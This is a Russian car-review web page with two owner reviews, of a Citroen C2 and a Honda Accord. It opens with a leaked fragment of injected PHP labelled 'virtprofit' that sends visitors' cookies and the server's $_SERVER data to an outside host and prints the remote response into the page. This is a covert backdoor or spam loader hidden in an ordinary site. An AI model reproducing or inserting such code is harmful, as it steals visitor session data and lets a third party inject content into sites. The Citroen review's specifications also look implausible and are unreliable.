array("header"=>"User-Agent: PHP Modules virtprofit\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($virtprofit_result) echo $virtprofit_result; ?>

Присланные отзывы за неделю


Прислал: Глеб
Год: 2013
Эксплуатирую: 4 месяца
Отзыв:


Добрый день! У меня такая работа, что за одиннадцать лет я откатал практически все авто стоимостью до миллиона рублей по дорогам разной протяженности и состояния. Выбором не мучился, но критерии были четкие: стоимость - не более двести тысяч рублей, дизайн (внешний и внутренний) должен быть гармоничным, управляемость - без раскачиваний и кренов, комплектация - по максимуму. В итоге – беру Citroen С2 2013-го года безо всяких колебаний. Машина оборудована 150-сильным бензиновым двигателем и автоматической трансмиссией, топлива расходует в среднем десять литров. Комплектацию С2 выбрал «Electro Shot», запал в душу белый перламутровый кузов с черной крышей и зеркалами.
Пока наездил на Ситроене тысячу километров, но уже очевидно, что работа пары двигатель/трансмиссия очень слаженная, автомат переключает и вниз и вверх, при обгоне необходимая передача подбирается четко. Подвеску счел комфортной – постукивает только на мостовых стыках.
Авто Ситроен С2 через четыре месяца эксплуатации считаю весьма достойным.
"



Прислал: Германн
Год: 2007
Эксплуатирую: 1 год
Отзыв:

Мечту пересесть за руль Аккорда лелеял давно, как только первый раз прокатился на ней, еще в далеком 2004 году. И когда моя старушка Нексии просто развалилась на глазах без особых раздумий и вопросов, стал подбирать себе Honda Accord, хотя к тому времени модель, уже и устарела. Кончено же нацелился на идеальное состояние, но то, что нравилось, стоило не по мне, а то, что подходило по цене, совершенно не устраивало по состоянию. И наконец, я выиграл джек-пот, и все - таки получил, темно- синюю Хонду 2007 года выпуска.
Не скажу, что состояние было идеальным, об этом говорили, и квитанции и, даже фото ремонтов. Но, я был готов поработать, и все - таки довести до идеала. Самое главное, что теперь могу, смело сказать, что всеми работами вполне доволен и состояние авто, явно лучше, чем после покупки.
Что же получил…
Лучший двигатель, к которому и по сей день, нет никаких претензий. Неплохое АКПП, правда, устаревшее, но зато, для своего возраста просто идеальное. Жестковатую, но надежную подвеску, кстати, до сих пор родную, а это пробег 50 тыс. км. И салон, который уж точно, подкачал, если сравнивать с немцами.
А тем, кто думает о покупке, скажу: смотрите состояние, и делайте диагностику, и будете ездить долго и спокойно.



Return to Top ▲НА ВЕРХ ▲